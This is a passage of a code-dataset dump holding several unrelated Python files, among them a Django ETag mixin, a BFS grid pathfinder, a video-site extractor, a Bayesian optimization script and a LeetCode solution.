reverse_geocode_result\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"417279877","text":"import hashlib\n\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.response import Response \nfrom rest_framework import status\n\nclass ETAGMixin(object):\n\t\"\"\"\n\tETAG Mixin adds the ETAG header to list responses which client can use to cach resources, If the client provided\n\tIf-None-Match header and the resource didn't change the server respond with 304 Not Modified. \n\t\"\"\"\n\tdef list(self, request, *args, **kwargs):\n\t\tqueryset = self.filter_queryset(self.get_queryset())\n\n\t\tpage = self.paginate_queryset(queryset)\n\t\tif page is not None:\n\t\t\tserializer = self.get_serializer(page, many=True)\n\t\t\treturn self.response_with_etag_or_304(request, serializer, self.get_paginated_response(serializer.data))\n\n\t\tserializer = self.get_serializer(queryset, many=True)\n\t\treturn self.response_with_etag_or_304(request, serializer, Response(serializer.data))\n\n\tdef response_with_etag_or_304 (self, request, serializer, response):\n\t\tetag = hashlib.md5(JSONRenderer().render(serializer.data)).hexdigest()\n\t\tnone_match_header = None\n\t\tif 'HTTP_IF_NONE_MATCH' in request.META:\n\t\t\tnone_match_header = request.META['HTTP_IF_NONE_MATCH']\n\t\telif 'If-None-Match' in request.META:\n\t\t\tnone_match_header = request.META['If-None-Match']\n\n\t\tif none_match_header:\n\t\t\tif etag == none_match_header:\n\t\t\t\tresponse_304 = Response (data= '{}', status = status.HTTP_304_NOT_MODIFIED)\n\t\t\t\treturn response_304\n\t\tresponse['ETAG'] = etag\n\t\treturn response\n","sub_path":"src/products/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"416425452","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 19 15:12:08 2019\n\n@author: emmetlee\nStudentID = 19240024\nPTAI Assignment3\n\"\"\"\nimport sys\nimport json\nimport numpy as np\n\n\"\"\"The solve() function takes an input file and returns a printed solution\"\"\"\ndef solve(grid):\n #Open the json file passed into the solve function\n d = json.load (open(grid))\n\n #Work out the shape and size of the input dictionary\n tmpd = {k: len(v) for k,v in d.items()}\n lengths = [lengthv for lengthv in tmpd.values()]\n \n \"\"\"Print the Output Grids for training inputs\"\"\"\n \n for i in range(lengths[1]):\n for j in range(len(d['train'][0]['input'][i])):\n #Create a new list to input the solution to\n #extend the input grid to create a larger output grid footprint\n output_grid1 = [] \n output_grid1.extend(d['train'][i]['input'][j])\n \n #iterate through the list and output to the solution grid\n for z in range(len(output_grid1)):\n output_grid1.append(output_grid1[2-z])\n #print as a numpy 2D array, rather than list\n print(np.asarray(output_grid1)) \n print(\" \") #Add a blank line between output grids\n\n \"\"\"Print the Output Grids for Evaluation inputs\"\"\"\n \n for i in range(lengths[0]):\n for j in range(len(d['test'][0]['input'][i])):\n #Create a new list to input the solution to\n output_grid2 = []\n output_grid2.extend(d['test'][i]['input'][j])\n \n #iterate through the list and output to the solution grid\n for z in range(len(output_grid2)):\n output_grid2.append(output_grid2[2-z])\n #print as a numpy 2D array, rather than list\n print(np.asarray(output_grid2))\n\n\"\"\"main function will call the solve function and pass in the json\"\"\"\ndef main():\n \"\"\"Call solve() function and pass the json\n Read the first command-line argument (after python script) \n as the input file\"\"\"\n input_grid = sys.argv[1]\n solve(input_grid) #pass the input file to the solve function\n \n\"\"\"Call the main function\"\"\" \nif __name__ == \"__main__\":\n main()","sub_path":"src/solution_c9e6f938.py","file_name":"solution_c9e6f938.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"158400251","text":"\n#nodes explored\n#path\nfrom collections import deque\ndef check(travel):\n\tif(vis[travel[0]][travel[1]] == -1 and travel[0] >= 0 and travel[0] < dim[0] and travel[1] >= 0 and travel[1] < dim[1]):\n\t\tif(grid[travel[0]][travel[1]] == '-' or grid[travel[0]][travel[1]] == '.'):\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\telse:\n\t\treturn False\t\n\t\ndef bfs(s,d) :\n\tl = deque()\n\tl.append(s)\n\tvis[s[0]][s[1]] = 0\n\tresult = -1\n\tcount = 0\n\tparent = [[(-1,-1)]*dim[1] for i in range(dim[0])]\n\trow = [-1,0,0,1]\n\tcol = [0,-1,1,0]\n\twhile(len(l) != 0):\n\t\tcurr = l.popleft()\n\t\tcount += 1\n\t\texplored.append(curr)\n\t\tif(curr[0] == d[0] and curr[1] == d[1]) :\n\t\t\tresult = vis[curr[0]][curr[1]]\n\t\t\tbreak\n\t\tfor index in range(4) :\n\t\t\tu,v = curr[0]+row[index] , curr[1]+col[index]\n\n\t\t\tif(check([u,v])):\n\t\t\t\tvis[u][v] = 1 + vis[curr[0]][curr[1]] \n\t\t\t\tl.append([u,v])\n\t\t\t\tparent[u][v] = (curr[0],curr[1])\n\t\t\n\treturn (result,count,parent)\n\n\n\nsource = list(map(int,input().split()))\ndestination = list(map(int,input().split()))\ndim = list(map(int,input().split()))\ngrid = [input() for i in range(dim[0])]\n#print(grid)\nvis = [[-1]*dim[1] for i in range(dim[0])]\nexplored = []\n(result,count,parent) = bfs(source,destination)\ntemp = destination\npath = []\nwhile(parent[temp[0]][temp[1]] != (-1,-1)) :\n\tpath.append((temp[0],temp[1]))\n\ttemp = parent[temp[0]][temp[1]]\npath.append(source)\npath.reverse()\nprint(count)\nfor i in explored :\n\tprint(i[0],i[1])\nprint(result)\nfor i in path:\n\tprint(i[0],i[1])\n","sub_path":"ass3/pacmanbfs.py","file_name":"pacmanbfs.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"643433259","text":"# @EXPECTED_RESULTS@: CORRECT\n\n#N log(N) solution (simulation)\nfrom sys import stdin;\nelim = [False];\n\n\nclass Solver:\n\n\tdef __init__(self):\n\t\tself.elim = [False];\n\n\tdef get_next_next(self, i):\n\t\telim = self.elim;\n\t\tN = len(elim);\n\t\tj=i;\n\t\tone = False;\n\t\twhile(True):\n\t\t\tj=j+1; j=j% N;\n\t\t\tif(not one and j==i):\n\t\t\t\treturn -1;\n\t\t\telif(not one and not elim[j]):\n\t\t\t\tone = True;\n\t\t\telif(one and not elim[j]):\n\t\t\t\treturn j;\n\n\tdef solve_iter(self,N):\n\t\tself.elim = N*[False];\n\t\telim = self.elim;\n\t\tif(N==1):\n\t\t\treturn 1;\n\t\ti = 1;\n\t\twhile(True):\n\t\t\tj = self.get_next_next(i);\n\t\t\tif(j==-1):\n\t\t\t\treturn i+1;\n\t\t\telim[i] = True;\n\t\t\ti = j;\n\n\nline = stdin.readline().strip();\nN = int(line);\nsol = Solver(); \nans = sol.solve_iter(N);\nprint(ans);\n\n","sub_path":"elect/elect-small-tb.py","file_name":"elect-small-tb.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"297023787","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom ykdl.extractor import VideoExtractor\nfrom ykdl.util.match import match1, matchall\nfrom ykdl.util.html import get_content, get_location\nfrom ykdl.videoinfo import VideoInfo\n\nimport json\n\ndef get_realurl(url):\n location = get_location(url)\n if location != url:\n return location\n else:\n html = get_content(url)\n return matchall(html, ['CDATA\\[([^\\]]+)'])[1]\n\nclass Sina(VideoExtractor):\n name = u\"新浪视频 (sina)\"\n\n def prepare(self):\n info = VideoInfo(self.name)\n if not self.vid:\n html = get_content(self.url)\n self.vid = match1(html, 'video_id:\\'([^\\']+)') or match1(self.url, '#(\\d+)')\n\n assert self.vid, \"can't get vid\"\n\n api_url = 'http://s.video.sina.com.cn/video/h5play?video_id={}'.format(self.vid)\n data = json.loads(get_content(api_url))['data']\n info.title = data['title']\n for t in ['mp4', '3gp', 'flv']:\n if t in data['videos']:\n video_info = data['videos'][t]\n break\n\n for profile in video_info:\n if not profile in info.stream_types:\n v = video_info[profile]\n tp = v['type']\n url = v['file_api']+'?vid='+v['file_id']\n r_url = get_realurl(url)\n info.stream_types.append(profile)\n info.streams[profile] = {'container': tp, 'video_profile': profile, 'src': [r_url], 'size' : 0}\n return info\n\n def prepare_list(self):\n html = get_content(self.url)\n return matchall(html, ['video_id: ([^,]+)'])\n\nsite = Sina()\n","sub_path":"ykdl/extractors/sina/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"171659559","text":"#!/usr/bin/python\nimport numpy as np\nfrom python.heatmap_sea import *\nfrom python.data_parser import *\n\nlocation=\"../data/intensity/sequential/collocate_\"\n\n\nprint (\"-----------------------------------------GPU Energy ratio data ----------------------\")\narray = np.zeros((15,15))\nprint (array)\nfor i in range(1,16,1): \n for j in range(1,16,1): \n array[i - 1][j - 1] = matrix_energy_ratio(location,\"gpu\",str(i),\"cpu\",str(j))\n #array[j - 1][i - 1] = matrix_energy_ratio(location,\"gpu\",str(i),\"cpu\",str(j))\n\n print (\"\")\n\n#print array\n#heat(array,\"GPU: Energy Ratio (collocated/standalone)\",\"GPU\", \"CPU\")\nheat(array,\"GPU: Energy Factor\",\"GPU\", \"CPU\", \"Energy scale\")\n#heat(array,\"For GPU: Energy Ratio (collocated/standalone)\",\"GPU\", \"CPU\", \"Ratio of Collocated and Standalone Energy for GPU\")\n\n\n\n\n","sub_path":"modified_ert/python_process_scripts/script_col_cpugpu1.py","file_name":"script_col_cpugpu1.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"447545036","text":"from setuptools import setup, find_packages\n\n\nlong_description = open(\"README.rst\", \"r\").read()\n\n\nsetup(\n name=\"arackpy\",\n\n version=\"0.1\",\n\n description=\"A multithreaded webcrawler and scraper\",\n\n # display on pypi\n long_description=long_description,\n\n url=\"https://www.bitbucket.com/denisgomes/arackpy\",\n\n author=\"Denis Gomes\",\n\n author_email=\"denisg640@hotmail.com\",\n\n license=\"BSD\",\n\n # advertise program attributes\n classifiers=[\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 2.7\",\n ],\n\n keywords=\"web crawler scraper\",\n\n # excluded in build distributions, applies to packages only\n packages=find_packages(exclude=[\n \"arackpy.docs\", \"arackpy.examples\", \"arackpy.tests\"\n ]),\n\n # install from pypi, requirements.txt is for developers only\n install_requires=[],\n\n package_data={},\n\n # MANIFEST.in works for source distributions only\n data_files=[(\"\", [\"LICENSE.txt\", \"README.rst\"])],\n\n # scripts= ,\n\n # tests\n test_suite=\"tests\",\n\n )\n","sub_path":"pypi_install_script/arackpy-0.1.0a1-py2-none-any/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"122730451","text":"\"\"\"\nPick 4 functions. See how the KG evolves and try out sampling rules.\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom builtins import str\nfrom builtins import range\nfrom past.utils import old_div\nimport numpy as np\nimport os, sys\nimport time\n\nfrom moe.optimal_learning.python.cpp_wrappers.domain import TensorProductDomain as cppTensorProductDomain\nfrom moe.optimal_learning.python.cpp_wrappers.knowledge_gradient_mcmc import PosteriorMeanMCMC\nfrom moe.optimal_learning.python.cpp_wrappers.log_likelihood_mcmc import \\\n GaussianProcessLogLikelihoodMCMC as cppGaussianProcessLogLikelihoodMCMC\nfrom moe.optimal_learning.python.cpp_wrappers.optimization import \\\n GradientDescentParameters as cppGradientDescentParameters\nfrom moe.optimal_learning.python.cpp_wrappers.optimization import \\\n GradientDescentOptimizer as cppGradientDescentOptimizer\nfrom moe.optimal_learning.python.cpp_wrappers.knowledge_gradient import posterior_mean_optimization, PosteriorMean\n\nfrom moe.optimal_learning.python.data_containers import HistoricalData, SamplePoint\nfrom moe.optimal_learning.python.geometry_utils import ClosedInterval\nfrom moe.optimal_learning.python.repeated_domain import RepeatedDomain\nfrom moe.optimal_learning.python.default_priors import DefaultPrior\n\nfrom moe.optimal_learning.python.python_version.domain import TensorProductDomain as pythonTensorProductDomain\nfrom moe.optimal_learning.python.python_version.optimization import \\\n GradientDescentParameters as pyGradientDescentParameters\nfrom moe.optimal_learning.python.python_version.optimization import \\\n GradientDescentOptimizer as pyGradientDescentOptimizer\nfrom moe.optimal_learning.python.python_version.optimization import multistart_optimize as multistart_optimize\n\nfrom examples import bayesian_optimization\nfrom examples import synthetic_functions\n\n# arguments for calling this script:\n# python main.py [obj_func_name] [method_name] [num_to_sample] [job_id]\n# example: python main.py Branin KG 4 1\n# you can define your own obj_function and then just change the objective_func object below, and run this script.\n\n# argv = sys.argv[1:]\n# obj_func_name = str(argv[0])\nmethod = \"KG\"\nnum_to_sample = 1\n# job_id = int(argv[3])\n\n# constants\n# num_func_eval = 12\n# num_iteration = int(old_div(num_func_eval, num_to_sample)) + 1\n\nobj_func_dict = {'Branin': synthetic_functions.Branin(),\n 'Rosenbrock': synthetic_functions.Rosenbrock(),\n 'Hartmann3': synthetic_functions.Hartmann3(),\n 'Levy4': synthetic_functions.Levy4(),\n 'Hartmann6': synthetic_functions.Hartmann6(),\n 'Ackley': synthetic_functions.Ackley()}\n\nobjective_func_list = [obj_func_dict[\"Branin\"], obj_func_dict[\"Rosenbrock\"], obj_func_dict[\"Hartmann3\"],\n obj_func_dict[\"Hartmann6\"]]\n# objective_func = obj_func_dict[obj_func_name]\ndim = [int(objective_func._dim) for objective_func in objective_func_list]\nnum_initial_points = [int(objective_func._num_init_pts) for objective_func in objective_func_list]\n\nnum_fidelity = [0, 0, 0, 0]\ninner_search_domain = [0, 0, 0, 0]\ncpp_search_domain = [0, 0, 0, 0]\ncpp_inner_search_domain = [0, 0, 0, 0]\nfor i in range(4):\n objective_func = objective_func_list[i]\n num_fidelity[i] = objective_func._num_fidelity\n inner_search_domain[i] = pythonTensorProductDomain([ClosedInterval(objective_func._search_domain[i, 0], objective_func._search_domain[i, 1])\n for i in range(objective_func._search_domain.shape[0] - num_fidelity[i])])\n cpp_search_domain[i] = cppTensorProductDomain([ClosedInterval(bound[0], bound[1]) for bound in objective_func._search_domain])\n cpp_inner_search_domain[i] = cppTensorProductDomain([ClosedInterval(objective_func._search_domain[i, 0], objective_func._search_domain[i, 1])\n for i in range(objective_func._search_domain.shape[0] - num_fidelity[i])])\n\ninit_pts = [0, 0, 0, 0]\nderivatives = [0, 0, 0, 0]\nobservations = [0, 0, 0, 0]\ninit_pts_value = [0, 0, 0, 0]\ntrue_value_init = [0, 0, 0, 0]\ninit_data = [0, 0, 0, 0]\nfor i in range(4):\n objective_func = objective_func_list[i]\n # get the initial data\n init_pts[i] = np.zeros((objective_func._num_init_pts, objective_func._dim))\n init_pts[i][:,\n :objective_func._dim - objective_func._num_fidelity] = inner_search_domain[\n i].generate_uniform_random_points_in_domain(\n objective_func._num_init_pts)\n for pt in init_pts[i]:\n pt[objective_func._dim - objective_func._num_fidelity:] = np.ones(objective_func._num_fidelity)\n\n # observe\n derivatives[i] = objective_func._observations\n observations[i] = [0] + [j + 1 for j in derivatives[i]]\n init_pts_value[i] = np.array([objective_func.evaluate(pt) for pt in init_pts[i]]) # [:, observations]\n true_value_init[i] = np.array([objective_func.evaluate_true(pt) for pt in init_pts[i]]) # [:, observations]\n\n init_data[i] = HistoricalData(dim=objective_func._dim, num_derivatives=0)\n init_data[i].append_sample_points([SamplePoint(pt, [init_pts_value[i][num, j] for j in observations[i]],\n objective_func._sample_var) for num, pt in enumerate(init_pts[i])])\n\nprior = [0, 0, 0, 0]\ncpp_gp_loglikelihood = [0, 0, 0, 0]\nfor i in range(4):\n # initialize the model\n prior[i] = DefaultPrior(1 + dim[i] + len(observations[i]), len(observations[i]))\n\n # noisy = False means the underlying function being optimized is noise-free\n cpp_gp_loglikelihood[i] = cppGaussianProcessLogLikelihoodMCMC(historical_data=init_data[i],\n derivatives=derivatives[i],\n prior=prior[i],\n chain_length=1000,\n burnin_steps=2000,\n n_hypers=2 ** 4,\n noisy=False)\n cpp_gp_loglikelihood[i].train()\n\npy_sgd_params_ps = pyGradientDescentParameters(max_num_steps=1000,\n max_num_restarts=3,\n num_steps_averaged=15,\n gamma=0.7,\n pre_mult=1.0,\n max_relative_change=0.02,\n tolerance=1.0e-10)\n\ncpp_sgd_params_ps = cppGradientDescentParameters(num_multistarts=1,\n max_num_steps=6,\n max_num_restarts=1,\n num_steps_averaged=3,\n gamma=0.0,\n pre_mult=1.0,\n max_relative_change=0.1,\n tolerance=1.0e-10)\n\ncpp_sgd_params_kg = cppGradientDescentParameters(num_multistarts=200,\n max_num_steps=50,\n max_num_restarts=2,\n num_steps_averaged=4,\n gamma=0.7,\n pre_mult=1.0,\n max_relative_change=0.5,\n tolerance=1.0e-10)\n\neval_pts = [0, 0, 0, 0]\ntest = [0, 0, 0, 0]\nps = [0, 0, 0, 0]\npy_repeated_search_domain = [0, 0, 0, 0]\nps_mean_opt = [0, 0, 0, 0]\nreport_point = [0, 0, 0, 0]\nfor i in range(4):\n objective_func = objective_func_list[i]\n # minimum of the mean surface\n eval_pts[i] = inner_search_domain[i].generate_uniform_random_points_in_domain(int(1e3))\n eval_pts[i] = np.reshape(\n np.append(eval_pts[i], (cpp_gp_loglikelihood[i].get_historical_data_copy()).points_sampled[:,\n :(cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)]),\n (eval_pts[i].shape[0] + cpp_gp_loglikelihood[i]._num_sampled,\n cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity))\n\n test[i] = np.zeros(eval_pts[i].shape[0])\n ps[i] = PosteriorMeanMCMC(cpp_gp_loglikelihood[i].models, num_fidelity[i])\n for j, pt in enumerate(eval_pts[i]):\n ps[i].set_current_point(pt.reshape((1, cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)))\n test[i] = -ps[i].compute_objective_function()\n report_point[i] = eval_pts[i][np.argmin(test[i])].reshape(\n (1, cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity))\n\n py_repeated_search_domain[i] = RepeatedDomain(num_repeats=1, domain=inner_search_domain[i])\n ps_mean_opt[i] = pyGradientDescentOptimizer(py_repeated_search_domain[i], ps[i], py_sgd_params_ps)\n report_point[i] = multistart_optimize(ps_mean_opt[i], report_point[i], num_multistarts=1)[0]\n report_point[i] = report_point[i].ravel()\n report_point[i] = np.concatenate((report_point[i], np.ones(objective_func._num_fidelity)))\n\ncurrent_best = [0, 0, 0, 0]\nbest_point = report_point\nfor i in range(4):\n current_best[i] = true_value_init[i][np.argmin(true_value_init[i][:, 0])][0]\n print(\"obj \", i, \" best so far in the initial data {0}\".format(current_best[i]))\n # print(\"obj \", i, \"report point value\", objective_func_list[i].evaluate_true(report_point[i])[0])\ncapital_so_far = 0\n\nnext_points = [0, 0, 0, 0]\nvoi = [0, 0, 0, 0]\nfor i in range(4):\n objective_func = objective_func_list[i]\n # KG\n time1 = time.time()\n discrete_pts_list = []\n\n discrete, _ = bayesian_optimization.gen_sample_from_qei_mcmc(cpp_gp_loglikelihood[i]._gaussian_process_mcmc,\n cpp_search_domain[i],\n cpp_sgd_params_kg, 10, num_mc=2 ** 10)\n for j, cpp_gp in enumerate(cpp_gp_loglikelihood[i].models):\n discrete_pts_optima = np.array(discrete)\n\n eval_pts = inner_search_domain[i].generate_uniform_random_points_in_domain(int(1e3))\n eval_pts = np.reshape(np.append(eval_pts,\n (cpp_gp.get_historical_data_copy()).points_sampled[:,\n :(cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)]),\n (eval_pts.shape[0] + cpp_gp.num_sampled, cpp_gp.dim - objective_func._num_fidelity))\n\n test = np.zeros(eval_pts.shape[0])\n ps_evaluator = PosteriorMean(cpp_gp, num_fidelity[i])\n for k, pt in enumerate(eval_pts):\n ps_evaluator.set_current_point(pt.reshape((1, cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)))\n test[k] = -ps_evaluator.compute_objective_function()\n\n initial_point = eval_pts[np.argmin(test)]\n\n ps_sgd_optimizer = cppGradientDescentOptimizer(cpp_inner_search_domain[i], ps_evaluator, cpp_sgd_params_ps)\n report_point = posterior_mean_optimization(ps_sgd_optimizer, initial_guess=initial_point, max_num_threads=4)\n\n ps_evaluator.set_current_point(\n report_point.reshape((1, cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)))\n if -ps_evaluator.compute_objective_function() > np.min(test):\n report_point = initial_point\n\n discrete_pts_optima = np.reshape(np.append(discrete_pts_optima, report_point),\n (discrete_pts_optima.shape[0] + 1,\n cpp_gp.dim - objective_func._num_fidelity))\n discrete_pts_list.append(discrete_pts_optima)\n\n ps_evaluator = PosteriorMean(cpp_gp_loglikelihood[i].models[0], num_fidelity[i])\n ps_sgd_optimizer = cppGradientDescentOptimizer(cpp_inner_search_domain[i], ps_evaluator, cpp_sgd_params_ps)\n # KG method\n next_points[i], voi[i] = bayesian_optimization.gen_sample_from_qkg_mcmc(\n cpp_gp_loglikelihood[i]._gaussian_process_mcmc,\n cpp_gp_loglikelihood[i].models,\n ps_sgd_optimizer, cpp_search_domain[i],\n num_fidelity[i], discrete_pts_list,\n cpp_sgd_params_kg, num_to_sample,\n num_mc=2 ** 7)\n print(method + \" takes \" + str((time.time() - time1)) + \" seconds for objective\", i)\n print(method + \" suggests points: \", next_points[i], \" with voi: \", voi[i])\n\nwhile True:\n print(method + \", multiples, {0}th iteration\".format(capital_so_far))\n\n # print(\"Suggested points: \", next_points)\n print(\"Corresponding voi: \", voi)\n print(\"Current best: \", current_best)\n\n i = int(input(\"pick the next sample i = {0, 1, 2, 3} (or -1 to quit): \"))\n if i == -1:\n break\n\n objective_func = objective_func_list[i]\n\n time1 = time.time()\n\n sampled_points = [SamplePoint(pt, objective_func.evaluate(pt)[observations[i]], objective_func._sample_var) for pt in\n next_points[i]]\n\n print(\"evaluating takes \" + str((time.time() - time1)) + \" seconds\")\n\n capital_so_far += len(sampled_points)\n print(\"evaluating takes capital \" + str(capital_so_far) + \" so far\")\n\n # retrain the model\n time1 = time.time()\n\n cpp_gp_loglikelihood[i].add_sampled_points(sampled_points)\n cpp_gp_loglikelihood[i].train()\n\n print(\"retraining the model takes \" + str((time.time() - time1)) + \" seconds\")\n time1 = time.time()\n\n # report the point\n eval_pts = inner_search_domain[i].generate_uniform_random_points_in_domain(int(1e4))\n eval_pts = np.reshape(np.append(eval_pts, (cpp_gp_loglikelihood[i].get_historical_data_copy()).points_sampled[:,\n :(cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)]),\n (eval_pts.shape[0] + cpp_gp_loglikelihood[i]._num_sampled,\n cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity))\n\n ps = PosteriorMeanMCMC(cpp_gp_loglikelihood[i].models, num_fidelity[i])\n test = np.zeros(eval_pts.shape[0])\n for j, pt in enumerate(eval_pts):\n ps.set_current_point(pt.reshape((1, cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)))\n test[j] = -ps.compute_objective_function()\n initial_point = eval_pts[np.argmin(test)].reshape((1, cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity))\n\n py_repeated_search_domain = RepeatedDomain(num_repeats=1, domain=inner_search_domain[i])\n ps_mean_opt = pyGradientDescentOptimizer(py_repeated_search_domain, ps, py_sgd_params_ps)\n report_point = multistart_optimize(ps_mean_opt, initial_point, num_multistarts=1)[0]\n\n ps.set_current_point(report_point.reshape((1, cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)))\n if -ps.compute_objective_function() > np.min(test):\n report_point = initial_point\n\n report_point = report_point.ravel()\n report_point = np.concatenate((report_point, np.ones(objective_func._num_fidelity)))\n\n print()\n print(\"Optimization finished successfully!\")\n print(\"The recommended point: \", end=' ')\n print(report_point)\n print(\"recommending the point takes \" + str((time.time() - time1)) + \" seconds\")\n best_point[i] = report_point\n current_best[i] = objective_func.evaluate_true(report_point)[0]\n print(method + \", VOI {0}, best so far {1}\".format(voi[i], current_best[i]))\n\n time1 = time.time()\n # KG\n discrete_pts_list = []\n\n discrete, _ = bayesian_optimization.gen_sample_from_qei_mcmc(cpp_gp_loglikelihood[i]._gaussian_process_mcmc,\n cpp_search_domain[i],\n cpp_sgd_params_kg, 10, num_mc=2 ** 10)\n for j, cpp_gp in enumerate(cpp_gp_loglikelihood[i].models):\n discrete_pts_optima = np.array(discrete)\n\n eval_pts = inner_search_domain[i].generate_uniform_random_points_in_domain(int(1e3))\n eval_pts = np.reshape(np.append(eval_pts,\n (cpp_gp.get_historical_data_copy()).points_sampled[:,\n :(cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)]),\n (eval_pts.shape[0] + cpp_gp.num_sampled, cpp_gp.dim - objective_func._num_fidelity))\n\n test = np.zeros(eval_pts.shape[0])\n ps_evaluator = PosteriorMean(cpp_gp, num_fidelity[i])\n for k, pt in enumerate(eval_pts):\n ps_evaluator.set_current_point(\n pt.reshape((1, cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)))\n test[k] = -ps_evaluator.compute_objective_function()\n\n initial_point = eval_pts[np.argmin(test)]\n\n ps_sgd_optimizer = cppGradientDescentOptimizer(cpp_inner_search_domain[i], ps_evaluator, cpp_sgd_params_ps)\n report_point = posterior_mean_optimization(ps_sgd_optimizer, initial_guess=initial_point, max_num_threads=4)\n\n ps_evaluator.set_current_point(\n report_point.reshape((1, cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)))\n if -ps_evaluator.compute_objective_function() > np.min(test):\n report_point = initial_point\n\n discrete_pts_optima = np.reshape(np.append(discrete_pts_optima, report_point),\n (discrete_pts_optima.shape[0] + 1,\n cpp_gp.dim - objective_func._num_fidelity))\n discrete_pts_list.append(discrete_pts_optima)\n\n ps_evaluator = PosteriorMean(cpp_gp_loglikelihood[i].models[0], num_fidelity[i])\n ps_sgd_optimizer = cppGradientDescentOptimizer(cpp_inner_search_domain[i], ps_evaluator, cpp_sgd_params_ps)\n # KG method\n next_points[i], voi[i] = bayesian_optimization.gen_sample_from_qkg_mcmc(\n cpp_gp_loglikelihood[i]._gaussian_process_mcmc,\n cpp_gp_loglikelihood[i].models,\n ps_sgd_optimizer, cpp_search_domain[i],\n num_fidelity[i], discrete_pts_list,\n cpp_sgd_params_kg, num_to_sample,\n num_mc=2 ** 7)\n\n print(method + \" takes \" + str((time.time() - time1)) + \" seconds for objective\", i)\n print(method + \" suggests points: \", next_points[i], \" with voi: \", voi[i])\n","sub_path":"examples/multi_kg_try.py","file_name":"multi_kg_try.py","file_ext":"py","file_size_in_byte":18482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"416758828","text":"# 给定一个非空的整数数组,返回其中出现频率前 k 高的元素。 \n# \n# \n# \n# 示例 1: \n# \n# 输入: nums = [1,1,1,2,2,3], k = 2\n# 输出: [1,2]\n# \n# \n# 示例 2: \n# \n# 输入: nums = [1], k = 1\n# 输出: [1] \n# \n# \n# \n# 提示: \n# \n# \n# 你可以假设给定的 k 总是合理的,且 1 ≤ k ≤ 数组中不相同的元素的个数。 \n# 你的算法的时间复杂度必须优于 O(n log n) , n 是数组的大小。 \n# 题目数据保证答案唯一,换句话说,数组中前 k 个高频元素的集合是唯一的。 \n# 你可以按任意顺序返回答案。 \n# \n# Related Topics 堆 哈希表 \n# 👍 421 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n dit = {}\n for i in nums:\n if i not in dit:\n dit[i] = 1\n else:\n dit[i] = dit[i] + 1\n temp = []\n for item in dit.items():\n temp.append(item[::-1])\n temp.sort(reverse=True)\n return [temp[i][1] for i in range(k)]\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"Week_02/[347]前 K 个高频元素.py","file_name":"[347]前 K 个高频元素.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"454448349","text":"import math\nimport numpy as np\nimport random\nimport os\n\nclass redOjaSanger(object):\n '''\n Red Neuronal para calculo de componentes principales\n '''\n #Inicializa la matriz de pesos con valores pequeños\n def __init__(self,Dim=[2,2,1],w_init=10,beta=1,verbose=7):\n #Dim es una lista con la dimension de cada capa\n #Dim[-1]==output // Dim[0]==input\n #w_init es un maximo/minimo para los pesos iniciales \n #(Se generan entre w_init/100 y -w_init/100)\n self.w_ = [];\n for i in range(len(Dim)-1):\n #Llena self.w_ con un array por espacio entre capas (len(Dim)-1 capas)\n #Cada elemento de self.w_ es un array de numpy con todos los pesos de esa capa (iniciados al azar)\n self.w_.append(np.array([[random.randint(-w_init,w_init)/100 for i in range(Dim[i]+1)] for j in range(Dim[i+1])]));\n\n self.Dim = Dim;\n self.beta = beta;\n #Esto es alto para testing\n self.verbose = verbose;\n\n print('\\nLa red neuronal fue creada con exito.')\n if self.verbose >= 10:\n print('Matriz de pesos (incluye bias):\\n')\n for x in self.w_:\n print(x)\n print('')\n\n #Derivada de la funcion identidad\n def _derivada_identidad(self,n,b):\n return b\n\n #Funcion identidad\n def _funcion_identidad(self,n,b):\n return n*b\n\n #Funcion que hace la sumatoria de w(ki)*y(k) para todos los valores de output\n def _suma_Oja(self,output,y):\n cont = 0;\n #Se recorre cada posicion del output\n #z es k en la teorica\n for z in range(len(output)):\n cont += self.w_OjaSanger[z,y]*output[z];\n return 